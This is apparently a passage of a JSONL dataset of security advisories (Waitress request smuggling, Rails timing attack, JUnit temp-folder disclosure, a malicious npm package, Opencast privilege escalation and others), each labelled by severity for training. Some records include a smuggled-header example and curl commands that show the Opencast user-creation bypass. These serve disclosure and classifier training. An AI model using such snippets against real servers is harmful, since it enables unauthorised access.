&quot;MAY&quot; part of the RFC7230 (https://tools.ietf.org/html/rfc7230#section-3.5) which states:\n\nAlthough the line terminator for the start-line and header fields is\n the sequence CRLF, a recipient MAY recognize a single LF as a line\n terminator and ignore any preceding CR.\n\nUnfortunately if a front-end server does not parse header fields with an LF the same way as it does those with a CRLF it can lead to the front-end and the back-end server parsing the same HTTP message in two different ways. This can lead to a potential for HTTP request smuggling/splitting whereby Waitress may see two requests while the front-end server only sees a single HTTP message.\n\nExample:\n\n```\nContent-Length: 100[CRLF]\nX-Header: x[LF]Content-Length: 0[CRLF]\n```\n\nWould get treated by Waitress as if it were:\n\n```\nContent-Length: 100\nX-Header: x\nContent-Length: 0\n```\n\nThis could potentially get used by attackers to split the HTTP request and smuggle a second request in the body of the first.\n\n### Patches\n\nThis issue is fixed in Waitress 1.4.0. This brings a range of changes to harden Waitress against potential HTTP request confusions, and may change the behaviour of Waitress behind non-conformist proxies.\n\nWaitress no longer implements the MAY part of the specification and instead requires that all lines are terminated correctly with CRLF. If any lines are found with a bare CR or LF a 400 Bad Request is sent back to the requesting entity.\n\nThe Pylons Project recommends upgrading as soon as possible, while validating that the changes in Waitress don&#39;t cause any changes in behavior.\n\n### Workarounds\n\nVarious reverse proxies may have protections against sending potentially bad HTTP requests to the backend, and or hardening against potential issues like this. If the reverse proxy doesn&#39;t use HTTP/1.1 for connecting to the backend issues are also somewhat mitigated, as HTTP pipelining does not exist in HTTP/1.0 and Waitress will close the connection after every single request (unless the Keep Alive header is explicitly sent... so this is not a fool proof security method)\n\n### Issues/more security issues:\n\n* open an issue at https://github.com/Pylons/waitress/issues (if not sensitive or security related)\n* email the Pylons Security mailing list: pylons-project-security@googlegroups.com (if security related)", "text_raw": "HTTP Request Smuggling: LF vs CRLF handling in Waitress\n\n[Severity: MEDIUM]\n\n### Impact\n\nWaitress implemented a &quot;MAY&quot; part of the RFC7230 (https://tools.ietf.org/html/rfc7230#section-3.5) which states:\n\n Although the line terminator for the start-line and header fields is\n the sequence CRLF, a recipient MAY recognize a single LF as a line\n terminator and ignore any preceding CR.\n\nUnfortunately if a front-end server does not parse header fields with an LF the same way as it does those with a CRLF it can lead to the front-end and the back-end server parsing the same HTTP message in two different ways. This can lead to a potential for HTTP request smuggling/splitting whereby Waitress may see two requests while the front-end server only sees a single HTTP message.\n\nExample:\n\n```\nContent-Length: 100[CRLF]\nX-Header: x[LF]Content-Length: 0[CRLF]\n```\n\nWould get treated by Waitress as if it were:\n\n```\nContent-Length: 100\nX-Header: x\nContent-Length: 0\n```\n\nThis could potentially get used by attackers to split the HTTP request and smuggle a second request in the body of the first.\n\n\n### Patches\n\nThis issue is fixed in Waitress 1.4.0. This brings a range of changes to harden Waitress against potential HTTP request confusions, and may change the behaviour of Waitress behind non-conformist proxies. \n\nWaitress no longer implements the MAY part of the specification and instead requires that all lines are terminated correctly with CRLF. If any lines are found with a bare CR or LF a 400 Bad Request is sent back to the requesting entity.\n\nThe Pylons Project recommends upgrading as soon as possible, while validating that the changes in Waitress don&#39;t cause any changes in behavior.\n\n### Workarounds\n\nVarious reverse proxies may have protections against sending potentially bad HTTP requests to the backend, and or hardening against potential issues like this. If the reverse proxy doesn&#39;t use HTTP/1.1 for connecting to the backend issues are also somewhat mitigated, as HTTP pipelining does not exist in HTTP/1.0 and Waitress will close the connection after every single request (unless the Keep Alive header is explicitly sent... so this is not a fool proof security method)\n\n### Issues/more security issues:\n\n* open an issue at https://github.com/Pylons/waitress/issues (if not sensitive or security related)\n* email the Pylons Security mailing list: pylons-project-security@googlegroups.com (if security related)", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-12-20", "split": "train"} -{"id": "5aad1e90c38e8733a50c", "text": "actionpack is vulnerable to remote bypass authentication\n\nThe http_basic_authenticate_with method in actionpack/lib/action_controller/metal/http_authentication.rb in the Basic Authentication implementation in Action Controller in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 does not use a constant-time algorithm for verifying credentials, which makes it easier for remote attackers to bypass authentication by measuring timing differences.", "text_raw": "actionpack is vulnerable to remote bypass authentication\n\n[Severity: LOW]\n\nThe http_basic_authenticate_with method in actionpack/lib/action_controller/metal/http_authentication.rb in the Basic Authentication implementation in Action Controller in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 does not use a constant-time algorithm for verifying credentials, which makes it easier for remote attackers to bypass authentication by measuring timing differences.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "98d98115c2bfaaa98048", "text": "TemporaryFolder on unix-like systems does not limit access to created files\n\n### Vulnerability\n\nThe JUnit4 test rule [TemporaryFolder](https://junit.org/junit4/javadoc/4.13/org/junit/rules/TemporaryFolder.html) contains a local information disclosure vulnerability.\n\nExample of vulnerable code:\n```java\npublic static class HasTempFolder {\n @Rule\n public TemporaryFolder folder = new TemporaryFolder();\n\n@Test\n public void testUsingTempFolder() throws IOException {\n folder.getRoot(); // Previous file permissions: `drwxr-xr-x`; After fix:`drwx------`\n File createdFile= folder.newFile(\"myfile.txt\"); // unchanged/irrelevant file permissions\n File createdFolder= folder.newFolder(\"subfolder\"); // unchanged/irrelevant file permissions\n // ...\n }\n}\n```\n\n### Impact\n\nOn Unix like systems, the system's temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system.\n\nThis vulnerability **does not** allow other users to overwrite the contents of these directories or files. This is purely an information disclosure vulnerability.\n\nWhen analyzing the impact of this vulnerability, here are the important questions to ask:\n\n1. Do the JUnit tests write sensitive information, like API keys or passwords, into the temporary folder?\n - If yes, this vulnerability impacts you, but only if you also answer 'yes' to question 2.\n - If no, this vulnerability does not impact you.\n2. Do the JUnit tests ever execute in an environment where the OS has other untrusted users. \n _This may apply in CI/CD environments but normally won't be 'yes' for personal developer machines._\n - If yes, and you answered 'yes' to question 1, this vulnerability impacts you.\n - If no, this vulnerability does not impact you.\n\n### Patches\n\nBecause certain JDK file system APIs were only added in JDK 1.7, this this fix is dependent upon the version of the JDK you are using.\n - Java 1.7 and higher users: this vulnerability is fixed in 4.13.1.\n - Java 1.6 and lower users: **no patch is available, you must use the workaround below.**\n\n### Workarounds\n\nIf you are unable to patch, or are stuck running on Java 1.6, specifying the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability.\n\n### References\n- [CWE-200: Exposure of Sensitive Information to an Unauthorized Actor](https://cwe.mitre.org/data/definitions/200.html)\n- Fix commit https://github.com/junit-team/junit4/commit/610155b8c22138329f0723eec22521627dbc52ae\n\n#### Similar Vulnerabilities\n - Google Guava - https://github.com/google/guava/issues/4011\n - Apache Ant - https://nvd.nist.gov/vuln/detail/CVE-2020-1945\n - JetBrains Kotlin Compiler - https://nvd.nist.gov/vuln/detail/CVE-2020-15824\n\n### For more information\nIf you have any questions or comments about this advisory, please pen an issue in [junit-team/junit4](https://github.com/junit-team/junit4/issues).", "text_raw": "TemporaryFolder on unix-like systems does not limit access to created files\n\n[Severity: MEDIUM]\n\n### Vulnerability\n\nThe JUnit4 test rule [TemporaryFolder](https://junit.org/junit4/javadoc/4.13/org/junit/rules/TemporaryFolder.html) contains a local information disclosure vulnerability.\n\nExample of vulnerable code:\n```java\npublic static class HasTempFolder {\n @Rule\n public TemporaryFolder folder = new TemporaryFolder();\n\n @Test\n public void testUsingTempFolder() throws IOException {\n folder.getRoot(); // Previous file permissions: `drwxr-xr-x`; After fix:`drwx------`\n File createdFile= folder.newFile(\"myfile.txt\"); // unchanged/irrelevant file permissions\n File createdFolder= folder.newFolder(\"subfolder\"); // unchanged/irrelevant file permissions\n // ...\n }\n}\n```\n\n### Impact\n\nOn Unix like systems, the system's temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system.\n\nThis vulnerability **does not** allow other users to overwrite the contents of these directories or files. This is purely an information disclosure vulnerability.\n\nWhen analyzing the impact of this vulnerability, here are the important questions to ask:\n\n1. Do the JUnit tests write sensitive information, like API keys or passwords, into the temporary folder?\n - If yes, this vulnerability impacts you, but only if you also answer 'yes' to question 2.\n - If no, this vulnerability does not impact you.\n2. Do the JUnit tests ever execute in an environment where the OS has other untrusted users. \n _This may apply in CI/CD environments but normally won't be 'yes' for personal developer machines._\n - If yes, and you answered 'yes' to question 1, this vulnerability impacts you.\n - If no, this vulnerability does not impact you.\n\n### Patches\n\nBecause certain JDK file system APIs were only added in JDK 1.7, this this fix is dependent upon the version of the JDK you are using.\n - Java 1.7 and higher users: this vulnerability is fixed in 4.13.1.\n - Java 1.6 and lower users: **no patch is available, you must use the workaround below.**\n\n### Workarounds\n\nIf you are unable to patch, or are stuck running on Java 1.6, specifying the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability.\n\n### References\n- [CWE-200: Exposure of Sensitive Information to an Unauthorized Actor](https://cwe.mitre.org/data/definitions/200.html)\n- Fix commit https://github.com/junit-team/junit4/commit/610155b8c22138329f0723eec22521627dbc52ae\n\n#### Similar Vulnerabilities\n - Google Guava - https://github.com/google/guava/issues/4011\n - Apache Ant - https://nvd.nist.gov/vuln/detail/CVE-2020-1945\n - JetBrains Kotlin Compiler - https://nvd.nist.gov/vuln/detail/CVE-2020-15824\n\n### For more information\nIf you have any questions or comments about this advisory, please pen an issue in [junit-team/junit4](https://github.com/junit-team/junit4/issues).", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-10-12", "split": "train"} -{"id": "b3daae6db202fe8baf81", "text": "Denial of service in django\n\nThe verify_exists functionality in the URLField implementation in Django before 1.2.7 and 1.3.x before 1.3.1 relies on Python libraries that attempt access to an arbitrary URL with no timeout, which allows remote attackers to cause a denial of service (resource consumption) via a URL associated with (1) a slow response, (2) a completed TCP connection with no application data sent, or (3) a large amount of application data, a related issue to CVE-2011-1521.", "text_raw": "Denial of service in django\n\n[Severity: HIGH]\n\nThe verify_exists functionality in the URLField implementation in Django before 1.2.7 and 1.3.x before 1.3.1 relies on Python libraries that attempt access to an arbitrary URL with no timeout, which allows remote attackers to cause a denial of service (resource consumption) via a URL associated with (1) a slow response, (2) a completed TCP connection with no application data sent, or (3) a large amount of application data, a related issue to CVE-2011-1521.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-07-23", "split": "train"} -{"id": "e4a66d9528a74a583c97", "text": "HTTP Request Smuggling in hyper\n\nVulnerable versions of hyper allow GET requests to have bodies, even if there is no Transfer-Encoding or Content-Length header. As per the HTTP 1.1 specification, such requests do not have bodies, so the body will be interpreted as a separate HTTP request.\n\nThis allows an attacker who can control the body and method of an HTTP request made by hyper to inject a request with headers that would not otherwise be allowed, as demonstrated by sending a malformed HTTP request from a Substrate runtime. This allows bypassing CORS restrictions. In combination with other vulnerabilities, such as an exploitable web server listening on loopback, it may allow remote code execution.\n\nThe flaw was corrected in hyper version 0.12.34.", "text_raw": "HTTP Request Smuggling in hyper\n\n[Severity: CRITICAL]\n\nVulnerable versions of hyper allow GET requests to have bodies, even if there is no Transfer-Encoding or Content-Length header. As per the HTTP 1.1 specification, such requests do not have bodies, so the body will be interpreted as a separate HTTP request.\n\nThis allows an attacker who can control the body and method of an HTTP request made by hyper to inject a request with headers that would not otherwise be allowed, as demonstrated by sending a malformed HTTP request from a Substrate runtime. This allows bypassing CORS restrictions. In combination with other vulnerabilities, such as an exploitable web server listening on loopback, it may allow remote code execution.\n\nThe flaw was corrected in hyper version 0.12.34.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "a4058778fd300cf501c0", "text": "Malicious Package in ali-contributors\n\nAll versions of `ali-contributors` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "Malicious Package in ali-contributors\n\n[Severity: CRITICAL]\n\nAll versions of `ali-contributors` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "2ad9170101c1cf3bb5b4", "text": "Path Traversal in @backstage/plugin-scaffolder-backend\n\n### Impact\n\nA malicious actor could read sensitive files from the environment where Scaffolder tasks are run. The attack is executed by crafting a custom Scaffolder template with a `publish:github:pull-request` action using a particular source path. When the template is executed the sensitive files would be included in the published pull request.\n\nThis vulnerability is mitigated by the fact that an attacker would need access to create and register templates in the Backstage catalog, and that the attack is very visible given that the exfiltration happens via a pull request.\n\n### Patches\n\nThe vulnerability is patched in the `0.15.9` release of `@backstage/plugin-scaffolder-backend`.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Open an issue in the [Backstage repository](https://github.com/backstage/backstage)\n* Visit our chat, linked to in [Backstage README](https://github.com/backstage/backstage)", "text_raw": "Path Traversal in @backstage/plugin-scaffolder-backend \n\n[Severity: MEDIUM]\n\n### Impact\n\nA malicious actor could read sensitive files from the environment where Scaffolder tasks are run. The attack is executed by crafting a custom Scaffolder template with a `publish:github:pull-request` action using a particular source path. When the template is executed the sensitive files would be included in the published pull request.\n\nThis vulnerability is mitigated by the fact that an attacker would need access to create and register templates in the Backstage catalog, and that the attack is very visible given that the exfiltration happens via a pull request.\n\n### Patches\n\nThe vulnerability is patched in the `0.15.9` release of `@backstage/plugin-scaffolder-backend`.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Open an issue in the [Backstage repository](https://github.com/backstage/backstage)\n* Visit our chat, linked to in [Backstage README](https://github.com/backstage/backstage)", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-10-19", "split": "train"} -{"id": "a76bc92b4675b923b354", "text": "Buffer overflow in OPC UA applications allows remote attackers to trigger a stack overflow with carefully structured requests.", "text_raw": "High severity vulnerability that affects OPCFoundation.NetStandard.Opc.Ua\n\n[Severity: HIGH]\n\nBuffer overflow in OPC UA applications allows remote attackers to trigger a stack overflow with carefully structured requests.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-10-16", "split": "train"} -{"id": "9f205dae4c7100d6e2e2", "text": "Duplicate Advisory: python-gnupg allows context-dependent attackers to trick gnupg to decrypt other ciphertext than intended\n\n**Withdrawn:** Duplicate of GHSA-2fch-jvg5-crf6", "text_raw": "Duplicate Advisory: python-gnupg allows context-dependent attackers to trick gnupg to decrypt other ciphertext than intended\n\n[Severity: MEDIUM]\n\n**Withdrawn:** Duplicate of GHSA-2fch-jvg5-crf6", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-03-13", "split": "train"} -{"id": "628b89885cf4eef30a64", "text": "Incorrect handling of H2 GOAWAY + SETTINGS frames\n\nEnvoy, which Pomerium is based on, can abnormally terminate if an H/2 GOAWAY and SETTINGS frame are received in the same IO event.\n\n### Impact\nThis can lead to a DoS in the presence of untrusted *upstream* servers.\n\n### Patches\n0.15.1 contains an upgraded envoy binary with this vulnerability patched.\n\n### Workarounds\nIf only trusted upstreams are configured, there is not substantial risk of this condition being triggered.\n\n### References\n[envoy GSA](https://github.com/envoyproxy/envoy/security/advisories/GHSA-j374-mjrw-vvp8)\n[envoy CVE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32780)\n[envoy announcement](https://groups.google.com/g/envoy-announce/c/5xBpsEZZDfE/m/wD05NZBbAgAJ)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [pomerium/pomerium](https://github.com/pomerium/pomerium/issues)\n* Email us at [security@pomerium.com](mailto:security@pomerium.com)", "text_raw": "Incorrect handling of H2 GOAWAY + SETTINGS frames\n\n[Severity: HIGH]\n\nEnvoy, which Pomerium is based on, can abnormally terminate if an H/2 GOAWAY and SETTINGS frame are received in the same IO event. \n\n### Impact\nThis can lead to a DoS in the presence of untrusted *upstream* servers.\n\n### Patches\n0.15.1 contains an upgraded envoy binary with this vulnerability patched.\n\n### Workarounds\nIf only trusted upstreams are configured, there is not substantial risk of this condition being triggered.\n\n### References\n[envoy GSA](https://github.com/envoyproxy/envoy/security/advisories/GHSA-j374-mjrw-vvp8)\n[envoy CVE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32780)\n[envoy announcement](https://groups.google.com/g/envoy-announce/c/5xBpsEZZDfE/m/wD05NZBbAgAJ)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [pomerium/pomerium](https://github.com/pomerium/pomerium/issues)\n* Email us at [security@pomerium.com](mailto:security@pomerium.com)\n\n", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-09-10", "split": "train"} -{"id": "0c01ead5815616ea843a", "text": "Insecure deserialization in Wire\n\nDue to how Wire handles type information in its serialization format, malicious payloads can be passed to a deserializer. e.g. using a surrogate on the sender end, an attacker can pass information about a different type for the receiving end. And by doing so allowing the serializer to create any type on the deserializing end.\n\n**This is the same issue that exists for .NET BinaryFormatter https://docs.microsoft.com/en-us/visualstudio/code-quality/ca2300?view=vs-2019**\n\nThis also applies to the fork of Wire, AkkaDotNet/Hyperion.", "text_raw": "Insecure deserialization in Wire\n\n[Severity: CRITICAL]\n\nDue to how Wire handles type information in its serialization format, malicious payloads can be passed to a deserializer. e.g. using a surrogate on the sender end, an attacker can pass information about a different type for the receiving end. And by doing so allowing the serializer to create any type on the deserializing end.\n\n**This is the same issue that exists for .NET BinaryFormatter https://docs.microsoft.com/en-us/visualstudio/code-quality/ca2300?view=vs-2019**\n\nThis also applies to the fork of Wire, AkkaDotNet/Hyperion.\n\n\n", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-05-19", "split": "train"} -{"id": "044a973c9c9047fcd080", "text": "Users with ROLE_COURSE_ADMIN can create new users in Opencast\n\n### Impact\n\nUsers with the role `ROLE_COURSE_ADMIN` can use the user-utils endpoint to create new users not including the role `ROLE_ADMIN`. For example:\n\n```bash\n# Use the admin to create a new user with ROLE_COURSE_ADMIN using the admin user.\n# We expect this to work.\n% curl -i -u admin:opencast 'https://example.opencast.org/user-utils/xy.json' -X PUT \\\n --data 'password=f&roles=%5B%22ROLE_COURSE_ADMIN%22%5D'\nHTTP/2 201\n\n# Use the new user to create more new users.\n# We don't expüect a user with just role ROLE_COURSE_ADMIN to succeed.\n# But it does work\n% curl -i -u xy:f 'https://example.opencast.org/user-utils/ab.json' -X PUT \\\n --data 'password=f&roles=%5B%22ROLE_COURSE_ADMIN%22%5D'\nHTTP/2 201\n```\n`ROLE_COURSE_ADMIN` is a non-standard role in Opencast which is referenced neither in the documentation nor in any code (except for tests) but only in the security configuration. From the name – implying an admin for a specific course – users would never expect that this role allows user creation.\n\n### Patches\n\nThis issue is fixed in 7.6 and 8.1 which both ship a new default security configuration.\n\n### Workarounds\n\nYou can fix this issue by removing all instances of `ROLE_COURSE_ADMIN` in your organization's security configuration (`etc/security/mh_default_org.xml` by default).\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n- Open an issue in [opencast/opencast](https://github.com/opencast/opencast/issues)\n- For security-relevant information, email us at security@opencast.org", "text_raw": "Users with ROLE_COURSE_ADMIN can create new users in Opencast\n\n[Severity: MEDIUM]\n\n### Impact\n\nUsers with the role `ROLE_COURSE_ADMIN` can use the user-utils endpoint to create new users not including the role `ROLE_ADMIN`. For example:\n\n```bash\n# Use the admin to create a new user with ROLE_COURSE_ADMIN using the admin user.\n# We expect this to work.\n% curl -i -u admin:opencast 'https://example.opencast.org/user-utils/xy.json' -X PUT \\\n --data 'password=f&roles=%5B%22ROLE_COURSE_ADMIN%22%5D'\nHTTP/2 201\n\n# Use the new user to create more new users.\n# We don't expüect a user with just role ROLE_COURSE_ADMIN to succeed.\n# But it does work\n% curl -i -u xy:f 'https://example.opencast.org/user-utils/ab.json' -X PUT \\\n --data 'password=f&roles=%5B%22ROLE_COURSE_ADMIN%22%5D'\nHTTP/2 201\n```\n`ROLE_COURSE_ADMIN` is a non-standard role in Opencast which is referenced neither in the documentation nor in any code (except for tests) but only in the security configuration. From the name – implying an admin for a specific course – users would never expect that this role allows user creation.\n\n### Patches\n\nThis issue is fixed in 7.6 and 8.1 which both ship a new default security configuration.\n\n### Workarounds\n\nYou can fix this issue by removing all instances of `ROLE_COURSE_ADMIN` in your organization's security configuration (`etc/security/mh_default_org.xml` by default).\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n- Open an issue in [opencast/opencast](https://github.com/opencast/opencast/issues)\n- For security-relevant information, email us at security@opencast.org", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-01-30", "split": "train"} -{"id": "929aed3563a9ed34410b", "text": "selenium-chromedriver Downloads Resources over HTTP\n\nAffected versions of `selenium-chromedriver` insecurely download an executable over an unencrypted HTTP connection.\n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `selenium-chromedriver`.\n\n## Recommendation\n\nNo patch is currently available for this vulnerability, and the author has marked the package as deprecated.\n\nThe best mitigation is currently to avoid using this package, using a different package if available.\n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised yo", "text_raw": "selenium-chromedriver Downloads Resources over HTTP\n\n[Severity: HIGH]\n\nAffected versions of `selenium-chromedriver` insecurely download an executable over an unencrypted HTTP connection. \n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `selenium-chromedriver`.\n\n\n## Recommendation\n\nNo patch is currently available for this vulnerability, and the author has marked the package as deprecated.\n\nThe best mitigation is currently to avoid using this package, using a different package if available. \n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised yo", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-02-18", "split": "train"} -{"id": "434981cb0f81e83e9b67", "text": "Cross-Site Scripting in harp\n\n# Withdrawn\n\nThis advisory has been withdrawn per request from the maintainer. Given harp is a static webserver, a XSS type of vulnerability is not appropriate.\n\n### Original advisory description\n\nAll versions of `harp` are vulnerable to Cross-Site Scripting. Due to misconfiguration of its rendering engine, `harp` does not sanitize the HTML output allowing attackers to run arbitrary JavaScript when processing malicious files.\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative module until a fix is made available.", "text_raw": "Cross-Site Scripting in harp\n\n[Severity: MEDIUM]\n\n# Withdrawn\n\nThis advisory has been withdrawn per request from the maintainer. Given harp is a static webserver, a XSS type of vulnerability is not appropriate.\n\n### Original advisory description\n\nAll versions of `harp` are vulnerable to Cross-Site Scripting. Due to misconfiguration of its rendering engine, `harp` does not sanitize the HTML output allowing attackers to run arbitrary JavaScript when processing malicious files.\n\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative module until a fix is made available.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-09-02", "split": "train"} -{"id": "e0df536f10743e7f6b62", "text": "HashiCorp Consul L7 deny intention results in an allow action\n\nIn HashiCorp Consul before 1.10.1 (and Consul Enterprise), xds can generate a situation where a single L7 deny intention (with a default deny policy) results in an allow action.", "text_raw": "HashiCorp Consul L7 deny intention results in an allow action\n\n[Severity: HIGH]\n\nIn HashiCorp Consul before 1.10.1 (and Consul Enterprise), xds can generate a situation where a single L7 deny intention (with a default deny policy) results in an allow action.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-07-19", "split": "train"} -{"id": "4af6bbd087d25820e179", "text": "Arbitrary code execution in clickhouse-driver\n\nclickhouse-driver before 0.1.5 allows a malicious clickhouse server to trigger a crash or execute arbitrary code (on a database client) via a crafted server response, due to a buffer overflow.", "text_raw": "Arbitrary code execution in clickhouse-driver\n\n[Severity: CRITICAL]\n\nclickhouse-driver before 0.1.5 allows a malicious clickhouse server to trigger a crash or execute arbitrary code (on a database client) via a crafted server response, due to a buffer overflow.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-04-07", "split": "train"} -{"id": "6ff7417ffb6af8705f30", "text": "Exposure of Sensitive Information to an Unauthorized Actor in Apache Kafka\n\nWhen Connect workers in Apache Kafka 2.0.0, 2.0.1, 2.1.0, 2.1.1, 2.2.0, 2.2.1, or 2.3.0 are configured with one or more config providers, and a connector is created/updated on that Connect cluster to use an externalized secret variable in a substring of a connector configuration property value, then any client can issue a request to the same Connect cluster to obtain the connector's task configuration and the response will contain the plaintext secret rather than the externalized secrets variables.", "text_raw": "Exposure of Sensitive Information to an Unauthorized Actor in Apache Kafka\n\n[Severity: HIGH]\n\nWhen Connect workers in Apache Kafka 2.0.0, 2.0.1, 2.1.0, 2.1.1, 2.2.0, 2.2.1, or 2.3.0 are configured with one or more config providers, and a connector is created/updated on that Connect cluster to use an externalized secret variable in a substring of a connector configuration property value, then any client can issue a request to the same Connect cluster to obtain the connector's task configuration and the response will contain the plaintext secret rather than the externalized secrets variables.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-05-12", "split": "train"} -{"id": "5247453e79ec120164dc", "text": "Windu CMS 2.2 Multiple Persistent Cross-Site Scripting Vulnerabilities", "text_raw": "Windu CMS 2.2 Multiple Persistent Cross-Site Scripting Vulnerabilities\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2013-07-24", "split": "train"} -{"id": "995b026006186ed98f73", "text": "Invalid Curve Attack in openpgp\n\nVersions of `openpgp` prior to 4.3.0 are vulnerable to an Invalid Curve Attack. The package's implementation of ECDH fails to verify the validity of the communication partner's public key. The package calculates the resulting key secret based on an altered curve instead of the specified elliptic curve. Attackers may exfiltrate the victim's private key by choosing the altered curve. An attack requires the attacker being able to initiate message decryption and record the result. Furthermore the victim's key must offer an ECDH public key.\n\n## Recommendation\n\nUpgrade to version 4.3.0 or later.\nIf you are upgrading from a version <4.0.0 it is highly recommended to read the `High-Level API Changes` section of the `openpgp` 4.0.0 release: https://github.com/openpgpjs/openpgpjs/releases/tag/v4.0.0", "text_raw": "Invalid Curve Attack in openpgp\n\n[Severity: MEDIUM]\n\nVersions of `openpgp` prior to 4.3.0 are vulnerable to an Invalid Curve Attack. The package's implementation of ECDH fails to verify the validity of the communication partner's public key. The package calculates the resulting key secret based on an altered curve instead of the specified elliptic curve. Attackers may exfiltrate the victim's private key by choosing the altered curve. An attack requires the attacker being able to initiate message decryption and record the result. Furthermore the victim's key must offer an ECDH public key.\n\n\n## Recommendation\n\nUpgrade to version 4.3.0 or later.\nIf you are upgrading from a version <4.0.0 it is highly recommended to read the `High-Level API Changes` section of the `openpgp` 4.0.0 release: https://github.com/openpgpjs/openpgpjs/releases/tag/v4.0.0", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-08-23", "split": "train"} -{"id": "75ddab808caa577dcc79", "text": "Apache Struts allows entering a custom URL in a form field if built-in URLValidator is used\n\nIn Apache Struts 2.3.7 through 2.3.33 and 2.5 through 2.5.12, if an application allows entering a URL in a form field and built-in URLValidator is used, it is possible to prepare a special URL which will be used to overload server process when performing validation of the URL. NOTE: this vulnerability exists because of an incomplete fix for S2-047 / CVE-2017-7672.", "text_raw": "Apache Struts allows entering a custom URL in a form field if built-in URLValidator is used\n\n[Severity: HIGH]\n\nIn Apache Struts 2.3.7 through 2.3.33 and 2.5 through 2.5.12, if an application allows entering a URL in a form field and built-in URLValidator is used, it is possible to prepare a special URL which will be used to overload server process when performing validation of the URL. NOTE: this vulnerability exists because of an incomplete fix for S2-047 / CVE-2017-7672.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-10-16", "split": "train"} -{"id": "686519627f5d9517f409", "text": "Authentication Weakness in keystone\n\nVersions of `keystone` prior to 0.3.16 are affected by a partial authentication bypass vulnerability. In the default sign in functionality, if an attacker provides a full and correct password, yet only provides part of the associated email address, authentication will be granted.\n\n## Recommendation\n\nUpdate to version 0.3.16 or later.", "text_raw": "Authentication Weakness in keystone\n\n[Severity: HIGH]\n\nVersions of `keystone` prior to 0.3.16 are affected by a partial authentication bypass vulnerability. In the default sign in functionality, if an attacker provides a full and correct password, yet only provides part of the associated email address, authentication will be granted.\n\n\n## Recommendation\n\nUpdate to version 0.3.16 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-06-07", "split": "train"} -{"id": "b5212719add5cda1ca16", "text": "Vulnerability in Apache Hadoop 0.23.x, 2.x before 2.7.5, 2.8.x before 2.8.3, and 3.0.0-alpha through 3.0.0-beta1 allows a cluster user to expose private files owned by the user running the MapReduce job history server process. The malicious user can construct a configuration file containing XML directives that reference sensitive files on the MapReduce job history server host.", "text_raw": "Moderate severity vulnerability that affects org.apache.hadoop:hadoop-main\n\n[Severity: MEDIUM]\n\nVulnerability in Apache Hadoop 0.23.x, 2.x before 2.7.5, 2.8.x before 2.8.3, and 3.0.0-alpha through 3.0.0-beta1 allows a cluster user to expose private files owned by the user running the MapReduce job history server process. The malicious user can construct a configuration file containing XML directives that reference sensitive files on the MapReduce job history server host.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-12-21", "split": "train"} 